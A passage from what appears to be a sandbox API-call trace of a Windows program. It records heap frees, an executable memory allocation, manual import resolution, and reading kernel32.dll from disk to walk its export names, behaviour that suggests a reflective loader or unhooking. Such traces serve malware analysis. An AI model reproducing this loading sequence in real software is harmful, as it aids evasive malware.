dwFlags=0x0, lpMem=0x2794de0 | out: hHeap=0x450000) returned 1 [0154.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x27a7ff0 | out: hHeap=0x450000) returned 1 [0154.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x27bb200 | out: hHeap=0x450000) returned 1 [0154.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x27ce410 | out: hHeap=0x450000) returned 1 [0154.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x27e1620 | out: hHeap=0x450000) returned 1 [0154.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x27f4830 | out: hHeap=0x450000) returned 1 [0154.180] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2807a40 | out: hHeap=0x450000) returned 1 [0154.181] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x281ac50 | out: hHeap=0x450000) returned 1 [0154.181] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x282de60 | out: hHeap=0x450000) returned 1 [0154.181] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2841070 | out: hHeap=0x450000) returned 1 [0154.181] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2854280 | out: hHeap=0x450000) returned 1 [0154.181] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2867490 | out: hHeap=0x450000) returned 1 [0154.181] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x287a6a0 | out: hHeap=0x450000) returned 1 [0154.181] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x288d8b0 | out: hHeap=0x450000) returned 1 [0154.181] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x28a0ac0 | out: hHeap=0x450000) returned 1 [0154.181] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x28b3cd0 | out: hHeap=0x450000) returned 1 [0154.181] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x28c6ee0 | out: hHeap=0x450000) returned 1 [0154.181] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x28da0f0 | out: hHeap=0x450000) returned 1 [0154.181] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x28ed300 | out: hHeap=0x450000) returned 1 [0154.181] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2900510 | out: hHeap=0x450000) returned 1 [0154.186] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2913720 | out: hHeap=0x450000) returned 1 [0154.186] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2926930 | out: hHeap=0x450000) returned 1 [0154.186] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2939b40 | out: hHeap=0x450000) returned 1 [0154.186] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x294cd50 | out: hHeap=0x450000) returned 1 [0154.187] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x295ff60 | out: hHeap=0x450000) returned 1 [0154.188] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2973170 | out: hHeap=0x450000) returned 1 [0154.188] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2986380 | out: hHeap=0x450000) returned 1 [0154.188] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2999590 | out: hHeap=0x450000) returned 1 [0154.188] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x29ac7a0 | out: hHeap=0x450000) returned 1 [0154.189] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x29bf9b0 | out: hHeap=0x450000) returned 1 [0154.189] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x29d2bc0 | out: hHeap=0x450000) returned 1 [0154.189] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x29e5dd0 | out: hHeap=0x450000) returned 1 [0154.189] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x29f8fe0 | out: hHeap=0x450000) returned 1 [0154.189] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2a0c1f0 | out: hHeap=0x450000) returned 1 [0154.193] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2a1f400 | out: hHeap=0x450000) returned 1 [0154.193] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2a32610 | out: hHeap=0x450000) returned 1 [0154.193] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2a45820 | out: hHeap=0x450000) returned 1 [0154.193] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2a58a30 | out: hHeap=0x450000) returned 1 [0154.193] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2a6bc40 | out: hHeap=0x450000) returned 1 [0154.195] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2a7ee50 | out: hHeap=0x450000) returned 1 [0154.196] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2a92060 | out: hHeap=0x450000) returned 1 [0154.196] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2aa5270 | out: hHeap=0x450000) returned 1 [0154.196] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2ab8480 | out: hHeap=0x450000) returned 1 [0154.196] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2acb690 | out: hHeap=0x450000) returned 1 [0154.196] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2ade8a0 | out: hHeap=0x450000) returned 1 [0154.196] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2af1ab0 | out: hHeap=0x450000) returned 1 [0154.196] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2b04cc0 | out: hHeap=0x450000) returned 1 [0154.196] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2b17ed0 | out: hHeap=0x450000) returned 1 [0154.201] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2b2b0e0 | out: hHeap=0x450000) returned 1 [0154.201] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2b3e2f0 | out: hHeap=0x450000) returned 1 [0154.201] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2b51500 | out: hHeap=0x450000) returned 1 [0154.201] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2b64710 | out: hHeap=0x450000) returned 1 [0154.201] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2b77920 | out: hHeap=0x450000) returned 1 [0154.201] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2b8ab30 | out: hHeap=0x450000) returned 1 [0154.203] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2b9dd40 | out: hHeap=0x450000) returned 1 [0154.249] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2bb0f50 | out: hHeap=0x450000) returned 1 [0154.249] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2bc4160 | out: hHeap=0x450000) returned 1 [0154.249] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2bd7370 | out: hHeap=0x450000) returned 1 [0154.249] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2bea580 | out: hHeap=0x450000) returned 1 [0154.249] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2bfd790 | out: hHeap=0x450000) returned 1 [0154.250] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2c109a0 | out: hHeap=0x450000) returned 1 [0154.250] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2c23bb0 | out: hHeap=0x450000) returned 1 [0154.254] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2c36dc0 | out: hHeap=0x450000) returned 1 [0154.254] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2c49fd0 | out: hHeap=0x450000) returned 1 [0154.254] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2c5d1e0 | out: hHeap=0x450000) returned 1 [0154.254] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2c703f0 | out: hHeap=0x450000) returned 1 [0154.254] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2c83600 | out: hHeap=0x450000) returned 1 [0154.254] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2c96810 | out: hHeap=0x450000) returned 1 [0154.256] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2ca9a20 | out: hHeap=0x450000) returned 1 [0154.257] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2cbcc30 | out: hHeap=0x450000) returned 1 [0154.257] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2ccfe40 | out: hHeap=0x450000) returned 1 [0154.257] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2ce3050 | out: hHeap=0x450000) returned 1 [0154.257] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2cf6260 | out: hHeap=0x450000) returned 1 [0154.257] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2d09470 | out: hHeap=0x450000) returned 1 [0154.257] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2d1c680 | out: hHeap=0x450000) returned 1 [0154.257] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2d2f890 | out: hHeap=0x450000) returned 1 [0154.261] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2d42aa0 | out: hHeap=0x450000) returned 1 [0154.261] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2d55cb0 | out: hHeap=0x450000) returned 1 [0154.261] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2d68ec0 | out: hHeap=0x450000) returned 1 [0154.263] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2d7c0d0 | out: hHeap=0x450000) returned 1 [0154.263] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2d8f2e0 | out: hHeap=0x450000) returned 1 [0154.265] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2da24f0 | out: hHeap=0x450000) returned 1 [0154.266] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2db5700 | out: hHeap=0x450000) returned 1 [0154.266] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2dc8910 | out: hHeap=0x450000) returned 1 [0154.267] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2df0080 | out: hHeap=0x450000) returned 1 [0154.267] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2e03290 | out: hHeap=0x450000) returned 1 [0154.267] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2e164a0 | out: hHeap=0x450000) returned 1 [0154.267] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2e296b0 | out: hHeap=0x450000) returned 1 [0154.267] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2e3c8c0 | out: hHeap=0x450000) returned 1 [0154.267] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2e4fad0 | out: hHeap=0x450000) returned 1 [0154.267] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2e62ce0 | out: hHeap=0x450000) returned 1 [0154.267] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2e75ef0 | out: hHeap=0x450000) returned 1 [0154.267] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2e89100 | out: hHeap=0x450000) returned 1 [0154.272] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2e9c310 | out: hHeap=0x450000) returned 1 [0154.273] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2eaf520 | out: hHeap=0x450000) returned 1 [0154.273] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2ec2730 | out: hHeap=0x450000) returned 1 [0154.273] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2ed5940 | out: hHeap=0x450000) returned 1 [0154.273] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2ee8b50 | out: hHeap=0x450000) returned 1 [0154.276] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2efbd60 | out: hHeap=0x450000) returned 1 [0154.276] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2f0ef70 | out: hHeap=0x450000) returned 1 [0154.276] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2f22180 | out: hHeap=0x450000) returned 1 [0154.276] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2f35390 | out: hHeap=0x450000) returned 1 [0154.277] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2f485a0 | out: hHeap=0x450000) returned 1 [0154.277] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2f5b7b0 | out: hHeap=0x450000) returned 1 [0154.279] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2f6e9c0 | out: hHeap=0x450000) returned 1 [0154.280] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2f81bd0 | out: hHeap=0x450000) returned 1 [0154.280] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2f94de0 | out: hHeap=0x450000) returned 1 [0154.280] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2fa7ff0 | out: hHeap=0x450000) returned 1 [0154.280] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2fbb200 | out: hHeap=0x450000) returned 1 [0154.280] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2fce410 | out: hHeap=0x450000) returned 1 [0154.280] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2fe1620 | out: hHeap=0x450000) returned 1 [0154.280] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2ff4830 | out: hHeap=0x450000) returned 1 [0154.284] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x3007a40 | out: hHeap=0x450000) returned 1 [0154.284] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x301ac50 | out: hHeap=0x450000) returned 1 [0154.284] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x302de60 | out: hHeap=0x450000) returned 1 [0154.285] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x3041070 | out: hHeap=0x450000) returned 1 [0154.285] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x3054280 | out: hHeap=0x450000) returned 1 [0154.285] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x3067490 | out: hHeap=0x450000) returned 1 [0154.285] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x307a6a0 | out: hHeap=0x450000) returned 1 [0154.285] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x308d8b0 | out: hHeap=0x450000) returned 1 [0154.285] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x30a0ac0 | out: hHeap=0x450000) returned 1 [0154.285] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x30b3cd0 | out: hHeap=0x450000) returned 1 [0154.285] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x30c6ee0 | out: hHeap=0x450000) returned 1 [0154.325] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x30da0f0 | out: hHeap=0x450000) returned 1 [0154.328] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x30ed300 | out: hHeap=0x450000) returned 1 [0154.330] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x3100510 | out: hHeap=0x450000) returned 1 [0154.333] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x3113720 | out: hHeap=0x450000) returned 1 [0154.772] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0154.826] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0154.826] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0154.827] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0154.827] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0154.827] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0154.827] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0154.827] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0154.828] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0154.828] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0154.828] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0154.828] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0154.828] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0154.829] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0154.829] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0154.829] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0154.829] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0154.829] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0154.829] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0154.829] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0154.830] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0154.830] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0154.830] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0154.830] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0154.830] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0154.830] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0154.831] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0154.831] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x47db40 | out: hHeap=0x450000) returned 1 [0154.831] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0154.835] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x460540 | out: hHeap=0x450000) returned 1 [0154.837] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0154.837] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0154.837] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0154.837] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0154.837] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0154.838] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0154.840] GetProcessHeap () returned 0x450000 [0154.840] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x68) returned 0x458d80 [0154.840] GetProcessHeap () returned 0x450000 [0154.840] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x469160 [0154.841] GetProcessHeap () returned 0x450000 [0154.841] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x48) returned 0x460a90 [0154.841] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0154.841] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0154.842] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0154.842] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0154.842] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0154.842] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0154.842] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0154.842] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0154.843] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0154.843] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0154.843] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0154.843] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0154.851] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0154.852] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0154.852] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0154.852] GetProcessHeap () returned 0x450000 [0154.852] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xac430) returned 0x47c5f0 [0154.857] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0154.857] ReadFile (in: hFile=0x134, lpBuffer=0x47c5f0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x47c5f0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0154.912] CloseHandle (hObject=0x134) returned 1 [0154.912] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0154.918] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0154.918] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0154.918] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0154.918] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0154.918] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0154.919] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0154.919] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0154.919] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0154.919] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0154.919] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0154.919] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0154.919] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0154.919] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0154.919] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0154.919] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0154.919] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0154.919] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0154.919] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0154.919] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0154.919] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0154.919] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0154.919] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0154.919] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0154.919] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0154.919] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0154.919] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0154.919] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0154.920] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0154.920] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0154.920] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0154.920] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0154.920] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0154.920] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0154.920] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0154.920] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0154.920] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0154.920] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0154.920] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0154.920] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0154.920] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0154.920] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0154.920] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0154.920] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0154.920] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0154.920] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0154.920] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0154.920] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0154.921] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0154.921] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0154.921] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0154.921] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0154.921] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0154.921] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0154.921] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0154.921] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") 